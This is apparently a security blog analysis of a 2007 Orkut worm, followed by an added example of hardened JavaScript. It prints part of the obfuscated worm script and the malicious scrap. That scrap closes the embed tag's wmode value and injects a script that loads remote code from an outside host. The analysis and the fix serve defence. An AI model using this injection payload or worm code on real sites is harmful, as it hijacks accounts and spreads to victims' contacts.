Orkut is a popular social networking site with millions of registered users. A couple of days ago Orkut was hit with a worm that impacted close to 700,000 users in approximately 24 hours. We took a closer look at the exploit to get an idea of why so many users' systems were infected. The exploit was contained in a JavaScript file, aptly named "virus.js", which was injected using an embed tag. Here is a snippet of the JavaScript file:
function $(p,a,c,k,e,d) { e=function(c) { return(c>35?String.fromCharCode(c+29):c.toString(36)) }; if(!''.replace(/^/,String)){ while(c--){d[e(c)]=k[c]||e(c)} k=[function(e){return d[e]}]; e=function(){return'\\w+'}; c=1 }; while(c--){ if(k[c]){ p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]) } } return p };
setTimeout( $(5 j=0;5 q=1q["2o.H"];5 E=1q["2p.K.27"];7 B(){Z{b i 14("29.1l")} L(e){};Z{b i 14("2b.1l")}L(e){};Z{b i 2l()}L(e){};b J}; 7 W(g,P,m,c,9,U){5 1m=g+"="+19(P)+(m?"; m="+m.2f():"")+(c?"; c="+c:"")+(9?"; 9="+9:"")+(U?"; U":""); 8.y=1m};7 v(g){5 l=8.y;5 A=g+"=";5 h=l.S("; "+A);6(h==-1){h=l.S(A);6(h!=0){b 2h}}16{h+=2}; 5 u=8.y.S(";",h);6(u==-1){u=l.M};b 2j(l.2m(h+A.M,u))}; 7 26(g,c,9){6(v(g)){8.y=g+"="+(c?"; c="+c:"")+(9?"; 9="+9:"")+"; m=1u, 1i-1v-1x 1g:1g:1i 1y";1U.1z(0)}}; 7 G(){5 3=B();6(3){3.R("1A","o://k.w.p/1B.z",C);3.a(J);3.Y=7(){6(3.X==4){6(3.1a==1c){5 1r=3.1Q;5 t=8.1n("t"); t.1D=1r;5 f=t.D("f").O(0);6(f){f.1M(f.D("1F").O(0));f.1G("1H","N");f.1J.1K="1L";8.1N.1f(f);V()}}16{G()}}}; 3.a(J)}};7 T(){5 a="H="+n(q)+"&K="+n(E)+"&15.1O";5 3=B();3.R(q,o://k.w.p/1P.z?1R=1S,C); 3.12(10-1e,Q/x-k-17-1b);3.a(a);3.Y=7(){6(3.X==4){6(3.1a!=1c){T();b};G()}}}; 7 V(){6(j==8.18("N").M){b}; …
We can see from the above code that the JavaScript is heavily obfuscated. After decoding and analyzing the strings in the script we confirmed that it is indeed targeting Orkut users. Our analysis of the decoded JavaScript showed that when the virus.js script is executed it forces the user to join a community called “Infectados pelo Vírus do Orkut”. The name of this community is in Portuguese and translates to “Infected by Virus Orkut.”
This is a novel way for the author of the worm to keep track of accounts infected by the worm. The script then loads the "friends list" of the infected Orkut account and sends each friend a malicious scrap. The worm uses Orkut scrap entries as its vector of propagation. Below is an example of the XML that defines the malicious Orkut scrap (the script file name is redacted):
2008 vem ai… que ele comece mto bem par avc <br/> [silver]RL Wed Dec 19 14:57:48 UTC+0530 2007[/silver] <br/> <embed src=”http://www.orkut.com/LoL.aspx” type= “application/x-shockwave-flash” wmode=”transparent’); Script=document.createElement(‘script’); Script.src=’http://files.myopera111.com/[REMOVED].js’; Document.getElementByTagname(‘head’)[0].appendChild (script);escape(‘” width=”1” height=”1”> </embed>
When you look at the XML there are a few attributes on the embed tag, such as wmode, width, height, etc. The embed tag expects these attributes in order to create a Flash object that displays the Flash content. Now when you look closely at the code, notice the wmode attribute:
wmode=”transparent’);
The author has closed the wmode value with ‘); and has appended script code inside the attribute value itself. Let’s analyze this further. We tested the script with a benign variant of the malicious scrap:
“<embed src="http://www.orkut.com/LoL.aspx" type="application/x-shockwave-flash" wmode="transparent” width=”1” height=”1”>”.
When Orkut parsed this scrapbook entry, we found it behaved in a similar way to the following code in an Orkut page:
<script type="text/javascript"> var flashWriter = new _SWFObject('http://www.orkut.com/LoL.aspx', '337533968', 1, 1, 9, '#FFFFFF', 'autohigh', '', '', '337533968'); flashWriter._addParam('wmode', 'transparent'); flashWriter._addParam('allowNetworking', 'internal'); flashWriter._addParam('allowScriptAccess', 'never'); flashWriter._setAttribute('style', ''); flashWriter._write('flashDiv337533968');</script>
The Orkut application parsed the scrap text and created the Flash object with the values specified in the scrap, copying the attribute values straight into the generated script. For the malicious scrap the generated source looks like the sample below; the injected code (highlighted in bold red in the original post) runs from script = document.createElement up to escape (). Note the trailing escape ( call: it absorbs the closing quote and parenthesis that Orkut's own template emits after the wmode value, so the whole statement still parses and the injected code runs:
flashWriter._addParam ( wmode, transparent); script = document.createElement ( script); script.src = http://files.myopera.com/virusd[REMOVED]; document.getElementsByTagName ( head) [0]. AppendChild script); escape (); flashWriter._addParam ( allowNetworking, internal); flashWriter._addParam ( allowSc
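The root cause is that Orkut built its _addParam call by concatenating an attribute value taken from the scrap directly into script text, so a value containing '); ends the string literal and the statement. The JavaScript below is an added illustration, not code from the original post or from Orkut: it contrasts that unsafe construction with a hardened one. The attribute parser, the buildFlashWriterUnsafe/buildFlashWriterSafe functions, the wmode allowlist, the isSingleAddParamCall check and the sample scrap tag (with injectedCode() as a placeholder) are all constructed for this example.

```javascript
// Added example, not from the original post or from Orkut's code.
// Shows why concatenating an <embed> attribute value into generated script
// text breaks, and how to emit the same _addParam call safely.

// Constructed sample scrap, shaped like the page's malicious scrap: the wmode
// value closes the single-quoted literal and the _addParam() call, appends a
// statement of its own, and re-opens a literal with escape(' so that the
// template's own closing '); still parses. injectedCode() is a placeholder.
const SAMPLE_SCRAP_EMBED =
  '<embed src="http://www.orkut.com/LoL.aspx" type="application/x-shockwave-flash" ' +
  'wmode="transparent\'); injectedCode(); escape(\'" width="1" height="1">';

// Hypothetical attribute parser: extracts name=value pairs from one <embed> tag.
// Values may be double-quoted, single-quoted or bare.
function parseEmbedAttributes(embedTag) {
  const attrs = {};
  const re = /([a-zA-Z][\w-]*)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/g;
  let m;
  while ((m = re.exec(embedTag)) !== null) {
    attrs[m[1].toLowerCase()] = m[2] ?? m[3] ?? m[4];
  }
  return attrs;
}

// Unsafe: mirrors the page's flashWriter._addParam( wmode, transparent) line,
// built by string concatenation. The attribute value lands inside a JS string
// literal unescaped, so a value containing '); leaves the literal.
function buildFlashWriterUnsafe(attrs) {
  return "flashWriter._addParam('wmode', '" + attrs.wmode + "');";
}

// Safe: wmode has only three legal values, so allowlist it (anything else falls
// back to the Flash default 'window'), and emit every string through a
// JS-literal encoder instead of raw concatenation.
const WMODE_ALLOWED = new Set(['window', 'opaque', 'transparent']);

function jsStringLiteral(value) {
  // JSON.stringify escapes quotes, backslashes and control characters; '<' is
  // escaped as well so the output can never close an enclosing <script> element.
  return JSON.stringify(String(value)).replace(/</g, '\\u003c');
}

function buildFlashWriterSafe(attrs) {
  const wmode = WMODE_ALLOWED.has(attrs.wmode) ? attrs.wmode : 'window';
  return 'flashWriter._addParam("wmode", ' + jsStringLiteral(wmode) + ');';
}

// Check for generated output: a correctly encoded parameter call is exactly one
// _addParam statement with a single well-formed string argument, however
// hostile the input was. The unsafe output fails this because extra statements
// follow the closing ');.
function isSingleAddParamCall(script) {
  const one = /^flashWriter\._addParam\((['"])wmode\1, (?:"(?:[^"\\]|\\.)*"|'(?:[^'\\]|\\.)*')\);$/;
  return one.test(script);
}

// Stand-alone demo of the two generators on the constructed scrap.
const demoAttrs = parseEmbedAttributes(SAMPLE_SCRAP_EMBED);
console.log('unsafe:', buildFlashWriterUnsafe(demoAttrs));
console.log('safe:  ', buildFlashWriterSafe(demoAttrs));
```

The same rule applies to src, type and every other value copied from the scrap: validate against what the feature actually needs, and encode whatever is still emitted as a JavaScript literal. Note that the allowScriptAccess=never parameter visible in Orkut's template offers no protection here, because the injected code runs as part of Orkut's own page script before the Flash object is ever created.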